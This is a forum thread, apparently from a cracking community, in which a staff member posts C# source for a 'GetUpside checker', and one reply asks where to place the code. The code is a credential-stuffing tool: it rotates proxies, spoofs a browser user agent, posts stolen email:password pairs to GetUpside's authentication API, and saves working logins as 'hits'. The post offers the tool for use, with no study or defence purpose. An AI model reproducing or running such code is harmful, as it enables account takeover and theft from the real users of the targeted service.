Welcome to Mobilarian Forum - Official Symbianize forum.

Join us now to get access to all our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, and so, so much more. It's also quick and totally free, so what are you waiting for?

GETUPSIDE CHECKER SOURCE CODE

Alexhost
host 6.1K

host

/dev/null
Staff member
Chief Executive Officer
Joined
Jun 22, 2014
Messages
3,247
Solutions
1
Reaction score
62,280
Points
113
Website
katz.to
grants
₲32,489
10 years of service
[hide cost="1337"]
public static bool CheckAccount(string[] s, string proxy)
    {
      for (int index = 0; index < Config.config.Retries + 1; ++index)
      {
        while (true)
        {
          try
          {
            using (HttpRequest httpRequest = new HttpRequest())
            {
              proxy = mainmenu.proxies.ElementAt<string>(new Random().Next(mainmenu.proxiesCount));
              if (mainmenu.proxyProtocol == "HTTP")
                httpRequest.Proxy = (ProxyClient) HttpProxyClient.Parse(proxy);
              if (mainmenu.proxyProtocol == "SOCKS4")
                httpRequest.Proxy = (ProxyClient) Socks4ProxyClient.Parse(proxy);
              if (mainmenu.proxyProtocol == "SOCKS5")
                httpRequest.Proxy = (ProxyClient) Socks5ProxyClient.Parse(proxy);
              httpRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0";
              httpRequest.IgnoreProtocolErrors = true;
              httpRequest.AllowAutoRedirect = false;
              httpRequest.SslCertificateValidatorCallback += (RemoteCertificateValidationCallback) ((obj, cert, ssl, error) => (cert as X509Certificate2).Verify());
              string str = httpRequest.Post("https://z2ni5sknta.execute-api.us-east-1.amazonaws.com/7_0_0/user/auth", "{\"email\":\"" + s[0] + "\",\"clearTextPassword\":\"" + s[1] + "\"}", "application/json").ToString();
              if (str.Contains("code\": \"SUCCESS"))
              {
                ++mainmenu.hits;
                if (mainmenu.p1 == "2")
                  Colorful.Console.WriteLine("[HIT - GETUPSIDE] " + s[0] + ":" + s[1], Color.Green);
                Export.AsResult("/Getupside_hits", s[0] + ":" + s[1]);
                return false;
              }
              if (str.Contains("Email/password incorrect"))
                break;
            }
          }
          catch (Exception ex)
          {
            ++mainmenu.errors;
          }
        }
      }
      return false;
    }

    public static string Base64Encode(string plainText) => Convert.ToBase64String(Encoding.UTF8.GetBytes(plainText));
  }
}

[/reply]
 
Itachi 666

Itachi

Akatsuki
Ardent
Access
Joined
Jul 13, 2020
Messages
839
Reaction score
14,698
Points
93
grants
₲7,474
4 years of service
pasilip po master


saan i lalagay to master securer?
 
Top Bottom